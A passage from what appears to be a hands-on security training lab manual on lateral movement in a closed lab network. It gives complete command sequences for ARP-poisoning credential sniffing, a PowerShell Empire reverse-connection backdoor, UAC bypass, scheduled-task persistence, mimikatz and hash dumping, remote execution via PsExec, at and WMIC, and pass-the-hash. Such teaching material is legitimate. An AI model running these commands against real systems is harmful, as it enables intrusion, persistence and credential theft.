password sent using the FTP protocol.
27. Using a command prompt, ping the Attacker machine:
ping 192.168.100.111
28. Check the ARP cache using the command:
arp -a
The output should show, that the Victim, 192.168.100.121, is cached with the same MAC
address as the Attacker on 192.168.100.111.
29. Stop ARP Poisoning and the Network Sniffer using their respective icons:
ARP POISONING: STOPPING ACTIVITIES
Note: ARP Poisoning works only on local networks within the same subnet. Therefore, Cain &
Abel will not be useful when trying to perform above activity between routed networks.

Lateral Movement
Exercise 8: Fileless Backdoor with Powershell Empire

Fileless attacks are one of the tools of choice for hackers because of the imperceptible way they can
infect systems with no trace. In this exercise, we will use modules of “Powershell Empire” to inject
malicious code directly into memory without touching the hard disk.
1. Open the console window of the Ubuntu machine and log in using user ubuntu (default
password: novirus=123).
2. Open a terminal via right-click on Desktop > Open terminal.
3. Run the following 2 commands to start Powershell Empire:
cd empire
sudo ./empire
Enter the password for user ubuntu again, when prompted.
Note: Refer to Appendix B.7 on page 116 for an overview of Powershell Empire commands.
4. Once started, Powershell Empire will show the following screen:
POWERSHELL EMPIRE: START SCREEN
Before Powershell Empire can be used for exploitation and further infiltration of a target
machine, Listeners need to be created. Listeners in Powershell Empire are the channels which
receive connections from our target machine.
5. Type the following command to navigate into the listener option:
listeners
It is normal to have a result of “No listeners currently active” on the list when you enter this
command for the first time.
6. To view options under listeners, type:
help
7. Start a listener module for http in Powershell Empire using the command:
uselistener http

8. To view the list of options for the http listener, type:
help
9. Use the following command to show information and required parameters for the particular type
of listener:
info
Fields under “Required” that are set to “True” should be filled with appropriate values. In this
case, all are set accordingly.
10. Start the listener using the command:
(Empire: listeners/http) > execute
11. This will start the http listener:
POWERSHELL EMPIRE: STARTING LISTENER
12. To see the list of active listeners, use the command:
(Empire: listeners/http) > listeners
13. To list all available stagers, type the following command, followed by <Space>, <Tab>, <Tab>:
(Empire: listeners) > usestager <Space>, <Tab>, <Tab>
Stagers in Powershell Empire are used to set the stage for the post-exploitation activities. They
are similar to payloads, which are used to create a connection back to Empire.
14. This will display a list of available stagers:
POWERSHELL EMPIRE: LIST OF AVAILABLE STAGERS
Powershell Empire can create loaders with different file types like “.vbs”, “.bat” etc. In this
exercise, we will use a “.lnk” file as a loader (stager).
15. To use a link file (shortcut) as a stager, type the following command:
(Empire: listeners) > usestager windows/launcher_lnk

Lateral Movement
16. Similar to the command uselistener, we can get more information and parameters about this
particular stager by running the command:
(Empire: stager/windows/launcher_lnk) > info
We can see that Listener is a required parameter, but has no value set yet. We will need to supply
the value in order to use the stager.
17. Set the Listener parameter of the stager to http:
(Empire: stager/windows/launcher_lnk) > set Listener http
18. As we’re creating a shortcut file, we also need to set the location of the stager output file. To
specify the location, type in the following command:
(Empire: stager/windows/launcher_lnk) > set OutFile /home/ubuntu/winshare/clickme.lnk
19. This completes the configuration of the stager. To execute the stager, run the command:
(Empire: stager/windows/launcher_lnk) > execute
20. The output will indicate, that the lnk file has been successfully created:
POWERSHELL EMPIRE: STAGER FILE EXPORTED
21. Type the following command to prepare execution of another stager:
(Empire: stager/windows/launcher_lnk) > back

23. Using Windows Explorer or the Run dialog, navigate to:
\\192.168.100.151\winshare
This will open a SMB share located on the Ubuntu machine, where we saved the “.lnk” stager file.
24. Copy the clickme.lnk to the desktop.
25. To analyze the content of the shortcut file, open Notepad.
26. In Notepad, open the file clickme.lnk from the Desktop.
Ensure to select Format > Word Wrap to see all contents.
27. We can identify, that this indeed is a script written in Powershell; even though the content of the
script is encoded in base64 and not readable:
POWERSHELL EMPIRE: CONTENTS OF LNK FILE

28. Close Notepad.

29. Double-click clickme.lnk on the Desktop.
This will execute the Powershell script within the “.lnk” file. This will create a reverse connection
back to the Ubuntu machine.
30. Switch back to the Ubuntu virtual machine.
31. As the stager has connected back to the Ubuntu via double-click on the “.lnk” file, a new agent is
created:
POWERSHELL EMPIRE: AGENT CREATED
32. Press <Enter> in the Powershell Empire console.

33. Run the following command:
(Empire: stager/windows/launcher_lnk) > agents
34. This will list all active agents:
POWERSHELL EMPIRE: LIST ALL ACTIVE AGENTS
The agent will report back with a random name. To identify easily what agent is being used in
case of multiple connections, it is recommended to rename the agent.
35. Type the following command to rename the agent:
rename 94MDPWE8 Victim1
Note: Replace 94MDPWE8 with your own agent name as identified in step 34.
36. To identify whether the rename was successful, run this command again:
(Empire:agents) > agents

Lateral Movement
POWERSHELL EMPIRE: AGENT SUCCESSFULLY RENAMED
37. To interact or use the agent called “Victim1”, use the following command:
(Empire:agents) > interact Victim1
38. Similar to previous modules, the following command allows to see a list of all available
commands:
(Empire:Victim1) > help
39. To use the command prompt on the target machine to display its hostname, type the command:
(Empire:Victim1) > shell hostname
40. Notice that we see PC-Victim as a result of hostname command:
POWERSHELL EMPIRE: EXECUTING REMOTE SHELL COMMANDS
This shows, that the command was executed successfully on the remote machine rather than
locally.
41. Press <Enter>.
42. To view system information of the target, run the command:
(Empire:Victim1) > sysinfo
43. The output will list few information about the target, such as the user currently running the
process, the Operating System, IP address etc:
POWERSHELL EMPIRE: SYSINFO COMMAND

In this activity, we used a “.lnk” file and not a Portable Executable file as a loader for our
backdoor, which will be later used for lateral movement.
44. Leave the Powershell Empire console open in preparation for the next activity.

Lateral Movement
Exercise 9: Privilege Escalation

Privilege escalation is the practice of leveraging system vulnerabilities to escalate privileges to
achieve greater access than administrators or developers originally intended.
Note: Before performing this exercise, ensure you have properly configured the backdoor and
reverse connection in Exercise 8.
1. If not there already, open the console windows of Ubuntu.

The Powershell Empire terminal should still be open, with an active agent running.
2. In the Powershell Empire terminal, modules can be accessed using the command usemodule. To
list all available modules, type the following command, followed by <Space>, <Tab> and <Tab>:
usemodule
Modules in Powershell Empire are used to perform specific tasks, such as bypassing UAC,
creating persistence, dump password hashes etc.
3. First, we want to use a module capable of checking for any Windows privilege escalation vectors.
Run the following command:
usemodule privesc/powerup/allchecks
4. More information and parameters about this particular module can be obtained, similar to
listeners and stagers, with the command:
info
5. Powershell Empire will display the following information:
PRIVILEGE ESCALATION: ALLCHECKS MODULE INFO
This module is used to run all current checks for windows privilege escalation vector. It has only
one required field, agent, which is already setup accordingly.

6. To apply the module on the agent, type the following command:
execute
This command will take a few moments.

7. Once the command is executed, the following information will be displayed:
PRIVILEGE ESCALATION: EXECUTE ALLCHECKS MODULE
As you can see at the top of the output, the module detected that the local group has
administrative privileges and advises to run a “BypassUAC attack” in order to elevate privileges.
8. Press <Enter>, followed by the command:
back
9. To run a “BypassUAC” attack, run the following command:
usemodule privesc/bypassuac
10. Type the following command to gain more insight about this specific module:
info
11. Any parameter, with the property Required set to “True” must be supplied. On this module,
Listener and Agent are the parameters required, whereas Listener has no value set yet:
PRIVILEGE ESCALATION: BYPASSUAC MODULE PARAMETERS
12. To set a value for the Listener parameter, run the following command:
set Listener http
This will set the Listener to http, which we have already set up during Exercise 8.

Lateral Movement
13. Confirm the setting of the parameter with the command:
info
14. As all required parameters are set, execute the module:
execute
15. When requested, press <Y>, followed by <Enter> to run the task on the remote machine:
PRIVILEGE ESCALATION: EXECUTE BYPASSUAC MODULE
Once the module “BypassUAC” was executed successfully, the target machine will use a new
agent for the elevated connection.
16. To identify the new agent, press <ENTER>, followed by the two commands:
back
agents
17. The list of agents should now contain 2 connections. Notice the * in front of the username for the
new agent:
PRIVILEGE ESCALATION: BYPASSUAC SUCCESSFUL
The asterisk (*) indicates that the new agent created has successfully performed “BypassUAC”
and elevated from a medium integrity process to a high integrity process. See below the different
integrity values:
Integrity Level Assigned Access Rights
High Full Administrator Rights
Medium Standard User Rights
Low Highly Restricted
PRIVILEGE ESCALATION: PROCESS INTEGRITY LEVEL

18. To easily identify the name of the agent, rename the latest added agent to Victim1A:
rename TMZ14E6Y Victim1A
Note: Replace TMZ14E6Y with your own agent name as identified in step 18.
19. To interact with the new agent, run the command:
interact Victim1A
20. This will establish a connection with Victim1A:
PRIVILEGE ESCALATION: ESTABLISH CONNECTION WITH ESCALATED ADMIN RIGHTS
We have now established communication with the Victim with full administrative privileges. In
order to keep those rights, we will require persistence, allowing to survive a reboot of the target
machine. For this exercise, we will use the “schtasks” module which maintains persistence of a
stager using the task scheduler of Windows, running as SYSTEM account.
21. Select the schtasks module by typing the following command:
usemodule persistence/elevated/schtasks*
22. List all required parameters of the module using the command:
info
23. This will list all required and optional parameters:
PRIVILEGE ESCALATION: SCHTASKS MODULE PARAMETERS

Lateral Movement
24. Even though they are optional parameters only, we will change the settings for Listener and
OnLogon:
set Listener http

set OnLogon true
OnLogon sets the trigger of the scheduled task to “user logon”; as soon as a user logs in to the
remote machine, the task is being executed.
Listener is not required for this module, however we configured it to ensure that after a reboot
the target will reconnect to the Attacker machine.
Also note down the value of the TaskName, as we can use it later during the exercise to correctly
identify the created task.
25. To start the schtasks module, run the command:
execute
26. Once asked, press <Y> and <Enter> to run the module:
PRIVILEGE ESCALATION: EXECUTE SCHTASKS MODULE
27. Once executed, press <Enter> again and type the back command twice:
PRIVILEGE ESCALATION: BACK OUT FROM MODULE INTO AGENTS SELECTION
28. Switch to Victim machine.

29. Click on Start and type Task Scheduler.
30. Open the Task Scheduler and navigate to Task Scheduler Library:
PRIVILEGE ESCALATION: WINDOWS 7 TASK SCHEDULER LIBRARY

31. Double-click the task Updater.

This is the name specified in the parameters of the schtasks module in Step 24.
32. In the Updater Properties window, select the tab “Actions”:
PRIVILEGE ESCALATION: “UPDATER” TASK PROPERTIES
33. Select the action Start a program from the list and click “Edit”.
34. The Program/script parameter is powershell.exe itself. However, the Add arguments (optional)
item shows the generated code by the schtasks module.
35. To test the privilege escalation and the persistence, reboot the Victim machine.
36. Once rebooted, login to the Victim machine.
38. As a result of the Updater scheduled task, there will be a new agent created. In Powershell
Empire, press <Enter>.
39. Type the following command to list all available agents:
list
40. The first two agents are marked in red, which means the agents are inactive:
PRIVILEGE ESCALATION: INACTIVE AGENT SESSIONS
Also take note of the new agent’s username. This agent is now running as SYSTEM instead of
Victim, which means any restriction on the Victim machine are successfully bypassed.

Lateral Movement
41. Rename the new agent to Victim1B and interact with it:
rename M7YF4TXW Victim1B

interact Victim1B
Note: Replace M7YF4TXW with your own agent name as identified in step 40.
42. Use the remote command prompt command to see the information about the agent:
shell hostname
43. This should give you the output PC-Victim:
PRIVILEGE ESCALATION: REMOTE SHELL COMMAND HOSTNAME
44. Run the command:
shell whoami
45. You will notice, that the process is now running under SYSTEM:
PRIVILEGE ESCALATION: REMOTE SHELL COMMAND WHOAMI
46. Press <Enter>.

As we’re now running the agent with elevated privileges, we can dump all credentials on the
system.
47. The following command uses the module powerdump, which will dump out the local hashes on
the Victim machine:
usemodule credentials/powerdump*
48. There are no parameters required, so we can run the module without modification:
execute

49. As the result, this module returns the hash dumps of local users from this machine:
PRIVILEGE ESCALATION: POWERDUMP MODULE OUTPUT
Similar to other hash dump tools we’ve discovered in previous exercises, the user credentials are
composed of [Username:UserID:LM Hash:NTLM Hash].
50. Press <Enter> and type the command:
back
51. To access credential dumps from Active Directory, we will use the module mimikatz, which has a
function called “logonpasswords”. Use the following command to use and execute the module:
usemodule credentials/mimikatz/logonpasswords*
execute
52. The output will reveal user accounts, both local and from AD, from the memory:
PRIVILEGE ESCALATION: REVEAL USER ACCOUNT CREDENTIALS FROM MEMORY USING MIMIKATZ

Lateral Movement
Exercise 10: ARP Poisoning to sniff HTTP(s) traffic

In this exercise, we will be using ARP Spoofing to intercept data packets intended for other
computers. In the process, we will be capturing passwords that are sent through the HTTP and HTTPS
protocols.
2. Open Internet Explorer and navigate to http://server/ACE202.
3. Login using the credentials of the Victim user account.
A web page with the Trend Micro logo appears:
ARP POISONING: VALID HTTP WEBSITE
4. Open another tab in Internet Explorer and navigate to https://server/ACE202.

Login again using the credentials of the Victim user account. The web page with the Trend Micro
logo appears again, this time secured.
5. On the address bar, click on the padlock icon near the URL to view the security details of the
current website:
ARP POISONING: PADLOCK ON HTTPS WEBSITES
6. Click on View certificates.

This will display the certificate issued by the server.

7. Click on the Certification Path tab:
ARP POISONING: CERTIFICATE DETAILS
This shows that the server certificate has been signed by the CA "ACE202-CA."
8. Click on “OK” and close Internet Explorer.
9. Switch to the Attacker machine and open Cain & Abel, if it's not already open.
10. Click on the Start/Stop Sniffer icon to start packet sniffing.
11. Click on the Start/Stop APR icon to start ARP poisoning routing.
The status in the APR tab should change from “Idle” to “Poisoning”.
13. Open the Control Panel and navigate to Network and Internet > Internet Options.
14. On the Internet Options pop up, click “Delete...” in the section Browsing history.
15. Place a check on all boxes and click “Delete”:
ARP POISONING: DELETE BROWSING HISTORY
16. Close all Internet Options windows.

17. Open Internet Explorer and navigate to http://server/ACE202.
Login using the credentials of the Victim user account. The web page with the Trend Micro logo
appears.
19. Click on the Passwords tab in Cain & Abel.

Lateral Movement
20. Navigate to Passwords > HTTP on the left panel. Notice that HTTP has a value of (4). This means
Cain & Abel was able to sniff four (4) passwords via HTTP:
ARP POISONING: HTTP PASSWORDS SUCCESSFULLY INTERCEPTED
21. Select and remove all of the passwords listed.

23. On Internet Explorer, open another tab and navigate to https://server/ACE202.
Login using the credentials of the Victim user account; this will again show the web page with the
Trend Micro logo.
25. The passwords tab remains empty since no passwords were intercepted, as the HTTPS protocol
was used.
26. Click on the APR tab at the bottom and click on ARP-Cert which has a value of (1) next to it.
Cain generates a self-signed certificate to spoof the certificate provided by the server. Take note
of the location of the certificate. By default, it is saved in the “Certs” folder of the Cain & Abel
program directory.
27. Open Windows Explorer and navigate to “C:\Program Files (x86)\Cain\Certs”.
28. Right-click on self-signed_192.168.100.131.crt and click on Properties.
29. In the Certificate properties window, select the “Details” tab and verify that the certificate was
recently created by the Attacker machine:
ARP POISONING: SPOOFED WEBSITE CERTIFICATE

30. Click “OK” and close Windows Explorer.

32. Refresh https://server/ACE202.
33. Internet Explorer now displays a warning, advising that "There is a problem with this website's
security certificate":
ARP POISONING: CERTIFICATE ERRORS
This would be normal behavior with self-signed certificates & expired certificates. In this case
however, it is due to a spoofed certificate.
34. Click on Continue to this website (not recommended).
35. On the address bar, click on Certificate error next to the URL:
ARP POISONING: CERTIFICATE DETAILS
36. Click on View certificates. The certificate window appears.

Lateral Movement
37. Click on the Certification Path tab.

You will notice, that the certificate is no longer the same as before and is now untrusted. Below
screenshot shows the comparison between the new, spoofed certificate on the left and the valid
one on the right:
ARP POISONING: CERTIFICATION PATH

39. Click on the Passwords tab at the bottom of Cain & Abel.
40. Click on HTTP and check the password intercepted from the HTTPS packet.
ARP POISONING: HTTPS PASSWORD SUCCESSFULLY INTERCEPTED
41. Stop ARP Poisoning and the Network Sniffer using their respective icons:
ARP POISONING: STOPPING ACTIVITIES

Exercise 11: Remote Execution with PsExec

In this exercise, we will be using PsExec to list directory contents, check network settings, and run
programs on a remote computer.
1. Access the Attacker machine
2. Open an elevated command prompt and navigate to the “Tools” folder:
cd \tools
3. Run the following command to confirm the local IP address:
ipconfig
This confirms that the local IP address is 192.168.100.111.

4. Run the same command remotely on the Victim machine using PsExec:
PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 ipconfig
If this is the first time the PsExec program is executed, an end-user license agreement from
Sysinternals will appear. Click “Agree” to continue.
Note: Refer to Appendix B.8 on page 116 for command parameters of PsExec.
5. The command prompt displays the results for the Victim machine as indicated by the IP address,
192.168.100.121:
PSEXEC: RUN IPCONFIG REMOTELY
6. Using PsExec.exe, view the contents of the root directory of the Victim machine using the
command:
PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 cmd /c dir c:\*.* /a

Lateral Movement
7. This will display the content of the Victim’s C: drive:
PSEXEC: REMOTELY LIST DIRECTORIES
8. PsExec is able to copy required executables to the target prior to execution. Run the following
command:
PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -h -c Attack.exe
This command will copy “Attack.exe” to the Victim machine for remote execution (“-c”) with
elevated privileges (“-h”).
9. The command returns error code 0, which means the process did not encounter any errors:
PSEXEC: REMOTE EXECUTION RETURN RESULT 0
10. Switch to the Victim machine to verify if the process was executed.
11. Open a normal command prompt, not an elevated one.
12. List the contents of the root drive:
dir c:\
13. A file called Attack.txt should be present. This file is generated by the Attack.exe process which
was remotely executed by the Attacker machine:
PSEXEC: ATTACK.TXT WAS DROPPED, ATTACK.EXE SUCCESSFULLY EXECUTED REMOTELY

14. Try to delete the Attack.txt file with the command:
del c:\Attack.txt
The command will fail due to Access being denied. This is caused by the parameter “-h”, as this
will create the process with elevated permissions.
15. Open an elevated command prompt and try to delete the file again:
del c:\Attack.txt
This time, the file is successfully deleted.

16. Verify if the file was deleted by listing the contents of the root directory:
dir c:\
17. The output indicates, that Attack.txt no longer exists:
PSEXEC: ATTACK.TXT SUCCESSFULLY DELETED
18. Close the elevated command prompt.

20. Re-run the last command, this time specifying the System account (-s) rather than elevated
privileges (-h):
PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -s -c Attack.exe
The command returns with an error code 0, which means the process did not encounter any
errors.
21. Switch to the Victim machine to verify if the process was executed.
22. Using the command prompt, list the content of the root folder:
dir c:\
The Attack.txt should be present again.

23. Display the content and view the details of the Attack.txt file using the command:
more C:\Attack.txt

Lateral Movement
24. The text "Successful Attack" is displayed along with the Process Owner \\NT
AUTHORITY\SYSTEM:
PSEXEC: PROCESS OWNER CHANGED TO SYSTEM

26. On a command prompt, navigate to “c:\Tools\samdump2”:
cd \Tools\samdump2
27. Execute samdump2:
samdump2.exe -l
28. This will dump on the screen the hashes for all existing accounts:
PSEXEC: LOCAL HASH DUMP WITH SAMDUMP2
29. Transfer a copy of the file libeay32.dll to the Victim machine:
net use \\192.168.100.121\admin$ /user:ACE202\Victim N0virus1

copy libeay32.dll \\192.168.100.121\admin$
PsExec is able to copy executable files to the target prior to remote execution. However, if there
is a dependency as in the case with samdump2, PsExec will not transfer any other required file.
Therefore we need to copy this file before running the PsExec command.
30. Execute Samdump2.exe remotely using PsExec.exe:
C:\Tools\PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -s -c samdump2.exe -

l

31. Once executed, the password hashes of all existing local accounts on the Victim machine will be
displayed on the screen:
PSEXEC: RECEIVE REMOTE HASH DUMPS

33. Open an elevated command prompt
34. Delete Attack.txt:
del c:\Attack.txt
35. Open Event Viewer by click on Start > Run > eventvwr.
36. On the left panel, expand Windows Logs > System.
37. Opening one of the last few events, it should indicate that the PSEXESVC service entered the
running state:
PSEXEC: EVENT VIEWER DISPLAYING INFORMATION ABOUT PSEXESVC SERVICE
38. Close the Event Properties window.

39. On the left panel, click on Security.

Lateral Movement
40. The latest audit logs will show, that the Victim account was successfully logged in:
PSEXEC: EVENT VIEWER DISPLAYING INFORMATION ON USER LOG IN STATUS
41. Click on the Details tab of the entry showing a successful login.
42. Expand System and scroll to the very bottom.
This will show that the account was logged in from the IP address of the Attacker machine,
192.168.100.111.
44. Using command prompt, delete the existing connection to the Victim machine in preparation for
the next activity:
net use \\192.168.100.121\admin$ /delete

Exercise 12: Remote Execution with AT

In this exercise, we will run programs from a remote computer using normal Windows programs.
Note: In more recent Operating Systems, the at command is marked as deprecated. As a

replacement, you could utilize the Windows command schtasks.exe, which provides a similar
feature set.
Refer to Appendix B.9 on page 117 for parameters of the at command as well as Appendix
B.10 on page 117 for schtasks parameters.
> Transfer a Malicious File to a Remote Computer

2. On an elevated command prompt, navigate to “C:\Tools”:
cd \tools
3. Connect to the Victim’s admin share via SMB and transfer the Attack.exe file:
net use \\PC-Victim\admin$ /user:ACE202\Victim N0virus1

copy attack.exe \\PC-Victim\admin$
4. Using the Victim administrator account on the Victim machine, we copied the Attack.exe file
from the Attacker machine to the Windows folder of the Victim machine:
AT: COPY ATTACK.EXE
>Remotely Schedule a Task to Execute a Program

1. Still on the Attacker machine, use the elevated command prompt to check the current time:
net time \\PC-Victim
This is to confirm the current time of the virtual machine, as it might be in a different time
zone than your own.
2. Add a new job on the Victim machine a few minutes after the current time. In below example,
“9:04” is used as the current time on the Victim machine is “9:02”:
at \\PC-Victim 09:04 C:\Windows\Attack.exe

Lateral Movement
3. The at command should return Added a new job with job ID = 1 if the execution was
successful:
AT: SUCCESSFULLY SCHEDULED TASK REMOTELY

5. On a command prompt, navigate to “C:\Windows\Tasks” and list its content:
cd \Windows\Tasks
dir
6. The At1.job created remotely should be on the list.
AT: CONFIRM CREATION OF AT1.JOB
7. Wait for the 3-4 minutes depending on the time you have set. Once the time has elapsed,
view the contents of root directory:
dir c:\
8. The Attack.txt file, a payload generated by the Attack.exe process, should appear on the
results:
AT: REMOTE TASK EXECUTED SUCCESSFUL

9. View the content and the details of the Attack.txt file:
more c:\Attack.txt
The text file contains the message "Successful Attack" with the Process Owner \\NT
AUTHORITY\SYSTEM.
10. Open Control Panel and navigate to System and Security > Administrative Tools > Task
Scheduler.
11. On the left panel, select Task Scheduler Library.
12. Select At1 in the list of tasks, and open the tab “History”:
AT: SCHEDULED TASK HISTORY
The latest entry should log the successful execution of the At1 task.
13. Open an elevated command prompt and delete the Attack.exe from “C:\Windows”:
del C:\windows\attack.exe
14. Also delete the Attack.txt payload from C:\:
del c:\Attack.txt

16. Delete the existing SMB connection to the Victim machine in preparation for the next
activity:
net use \\PC-Victim\admin$ /delete

Lateral Movement
Exercise 13: Remote Execution with WMIC

In this exercise, we will be using the Windows Management Instrumentation Command-line (WMIC)
tool to remotely create and elevated user accounts.
> Transfer a Malicious File to a Remote Computer

2. Open an elevated command prompt and navigate to “C:\Tools”:
cd \tools
3. Map Victim’s C: drive via SMB as local drive R:
net use R: \\PC-Victim\C$ /user:ACE202\Victim N0virus1
4. Copy the Attack.exe file to the Victim machine's “C:\Windows” directory using the mapped
network drive R:
copy Attack.exe r:\Windows
Using the Victim’s administrator account on the Victim machine, we copied the attack.exe file
from the Attacker machine to the Windows folder of the Victim machine.
>Use WMIC to Execute Files Remotely

1. Still on the Attacker machine, execute Attack.exe remotely using WMIC from command line:
wmic /node:"PC-Victim" /user:ACE202\Victim /password:N0virus1 process call create

"c:\Windows\Attack.exe"
If this is the first time you run WMIC, you will see a message indicating that WMIC is being
installed.
Note: Refer to Appendix B.11 on page 117 for further information on wmic.
2. Once finished, it will execute the command on the Victim machine and will display the
following message:
WMIC: EXECUTING ATTACK.EXE REMOTELY


4. Open a command prompt and verify if Attack.exe was successfully executed:
dir c:\
The Attack.txt file, which is a payload generated by Attack.exe, should appear in the file list.
5. View the content and the details of the Attack.txt file:
more c:\Attack.txt
The text “Successful Attack" is displayed along with the Process Owner.
6. Open Control Panel and navigate to System and Security > Administrative Tools > Event
Viewer.
7. On the left panel, expand Windows Logs and select Security.
8. Inspect the latest logon entries. One of them shows that the Victim account successfully
logged on from the IP address of the Attacker machine:
WMIC: DISPLAY EVENT VIEWER INFORMATION
9. Select View > Show Analytic and Debug Logs in the main menu.
10. On the left panel, expand Applications and Services Logs > Microsoft > Windows > WMI-
Activity and select Trace. The list is currently empty, no events were logged.
Note: With the default settings of Windows Operating Systems, not all logging is enabled.
Therefore it is expected to have the WMI Activity Trace log being empty. This is very
important to consider, especially in investigation scenarios, as useful information might
not be readily available when needed.

Lateral Movement
>Configuring WMI-Activity Trace in Event Viewer

1. Using the elevated command prompt, enable WMI-Activity Trace:
wevtutil sl Microsoft-Windows-WMI-Activity/Trace /e:true
2. When prompted about enabling and clearing the log, press <y>:
WMIC: ENABLE WMI ACTIVITY TRACE AND CLEAR LOGS
3. To confirm the trace is now recording, switch to the Attacker machine.

4. Execute Attack.exe remotely again using WMIC:
wmic /node:"PC-Victim" /user:ACE202\Victim /password:N0virus1 process call create

"c:\Windows\Attack.exe"
5. Switch back to the Victim machine.

6. Check the Event Viewer again by refreshing the current view of Applications and Services
Logs > Microsoft > Windows > WMI-Activity > Trace.
7. The list now displays the recent WMI activities:
WMI: WMI ACTIVITY TRACE RECORDED WMIC ACTIVITY
8. Open an elevated command prompt and delete Attack.exe as well as Attack.txt:
del c:\Windows\Attack.exe
del c:\Attack.txt

10. Delete the mapped drive and existing SMB connection to the Victim machine in preparation
for the next activity:
net use r: /delete

Exercise 14: Remote Port Forwarding and RDP

In this exercise, we will configure port forwarding on the Victim machine remotely to bypass FTP
restrictions on the Server machine. We will also use remote commands to enable RDP on a target
machine.
> Forward Traffic that Passes Through the FTP Port

1. Access the Attacker machine and open an elevated command prompt.
2. Navigate to “C:\Tools”:
cd \tools
3. Add a new user harry to the Victim machine using PsExec.exe:
PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -h net user harry

Pass1234 /add
4. Add the new user harry to the Victim machine's administrators group:
PSTools\PsExec.exe \\192.168.100.121 -u ACE202\Victim -p N0virus1 -h net localgroup

administrators harry /add
5. Check if you can FTP to the Server machine by using the command:
ftp 192.168.100.131
6. The results show that you are not allowed to use FTP on the remote host:
PORT FORWARDING: FTP DENIED ACCESS BASED ON SOURCE IP

Lateral Movement
7. Setup port forwarding remotely on the Victim machine:
PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h netsh interface

portproxy add v4tov4 listenaddress=192.168.100.121 listenport=2121
connectaddress=192.168.100.131 connectport=21
With the above command, we create a port forwarding rule on the Victim, which redirects
any incoming connection on port 2121 to port 21 of the Server machine.
Note: Refer to Appendix B.12 on page 118 for more information on the netsh command.
8. Add a firewall rule remotely to open up the FTP port 2121:
PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h netsh advfirewall

firewall add rule name="FTP_Forward" dir=in action=allow protocol=TCP localport=2121
9. Each of the PsExec.exe commands should return error code 0 when completed.
10. Use the following 2 commands to connect to port 2121:
ftp
open 192.168.100.121 2121
We have configured this port to forward traffic to port 21 of the Server machine.
The Attacker machine is now allowed to connect to the Server FTP, as the Server sees the
traffic coming from Victim, rather than the Attacker machine.
11. Provide the following credentials to the FTP:
Username: FtpUser
Password: FtpPass
12. We’re now logged on to the FTP Server:
PORT FORWARDING: SUCCESSFULLY LOGGED IN TO FTP SERVER
13. Exit the FTP command line:
quit

>Enable Remote Access to the Victim Machine

1. Still on the Attacker machine, open the Remote Desktop application via Start > Run >
mstsc.exe.
2. Specify the Victim’s IP, 192.168.100.121, as Computername and click “Connect”.
3. The Remote Desktop client will fail with the following message:
REMOTE RDP: CONNECTION FAILED
4. Close the error message and switch back to the elevated command prompt.
5. Still in the “C:\Tools” directory, enable RDP access remotely on Victim via the command:
PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h reg add

"HKLM\System\CurrentControlSet\Control\Terminal Server" /f /v fDenyTSConnections /t
REG_DWORD /d 0
The above command uses PsExec to manipulate registry entries on the target machine,
specifically the “fDenyTSConnections” key.
6. Add a firewall exception for RDP:
PSTools\PsExec.exe \\192.168.100.121 -u PC-Victim\harry -p Pass1234 -h netsh advfirewall

firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389
7. Both commands will be successful with the error code 0 message:
REMOTE RDP: MANIPULATING REGISTRY KEYS AND ADVFIREWALL SETTINGS WITH PSEXEC
8. Switch back to the RDP Client and try to connect again to the Victim machine on
192.168.100.121.
This time, a prompt will ask for login credentials. Specify the credentials for the Victim user.

Lateral Movement
9. When prompted about the identity of the remote computer and the validation of the
certificate, click on “Yes”:
REMOTE RDP: IDENTITY WARNING
Optionally, the Don't ask me again… check box can be enabled to prevent this notification in
the future.
This will start a Remote Desktop session to the Victim machine and proves, that our remote
execution using PsExec was successful.
10. Close the RDP client.

Exercise 15: Pass-The-Hash

In this exercise, we will be using the Windows Credentials Editor (wce) to replace a logon session's
NTLM hash. This tricks the machine into thinking that the current user is authenticated as another
user.
Note: The use of wce is limited to a certain set of Operating Systems. When used in environments
with newer version of Windows, such as Windows 10 and Windows 2012, wce might not work
as expected. Alternative tools however could be utilized, such as the mimikatz framework.
Refer to Appendix B.13 on page 118 for information about wce parameters.

2. Map the Attacker machine's C: drive as network drive X:
net use X: \\192.168.100.111\c$
3. Dump the password hashes of the Server machine to a hashes.txt file:
x:
cd \tools
gsecdump-v2b5.exe -s > hashes.txt
Remember: Gsecdump is only working on OS up to Windows XP and 2003.

With the above command, we saved the hash dump onto the X: drive, which is located on the
Attacker machine.
4. Remove the mapped network drive X:
c:
net use x: /delete

6. Open an elevated command prompt and navigate to “C:\Tools”:
cd \tools
7. Run the following command to open hashes.txt using Notepad:
notepad hashes.txt
8. The information in the text file are stored in the following sequence:
Account Name:Account ID:LM Hash:NTLM Hash:::

Lateral Movement
9. Highlight the LM and NTLM hash only for the account ACE202\Victim and copy it to the
clipboard:
PASS-THE-HASH: COPY LM & NTLM HASH
10. Switch back to the elevated command prompt.

11. Use the following commands to check the current logon credentials:
cd wce_v1_41beta_universal
wce -w
12. This command will display the username and the cleartext password of the account that is
currently logged on:
PASS-THE-HASH: WCE -W DISPLAYS ACCOUNT DETAILS IN CLEARTEXT
13. Attempt to access the content of the C: drive of the Victim machine remotely without specifying
a user account:
dir \\192.168.100.121\C$
As there was no user specified, this command uses the credentials of the user currently logged
in. As that user has no permissions on the Victim machine, the “dir” command will fail.
14. Use wce to change the NTLM credentials of the current command prompt window:
wce -s Victim:ACE202:[LM Hash]:[NTLM Hash]
Ensure to replace “[LM Hash]:[NTLM Hash]” with the contents of your “hashes.txt”, taken in step
9.
Above command will change the NTLM credentials, but this is only valid for the command prompt
wce is started in.

15. Once executed, wce will return the message NTLM credentials successfully changed:
PASS-THE-HASH: WCE -S SUCCESSFULLY CHANGED NTLM CREDENTIALS
16. Verify the new NTLM credentials allow to query the contents of the C: drive remotely from the
Victim machine:
dir \\192.168.100.121\C$
17. By replacing the NTLM credentials of the current logon session, the dir command is now
successful:
PASS-THE-HASH: ACCESS GRANTED BY REPLACING NTLM CREDENTIALS
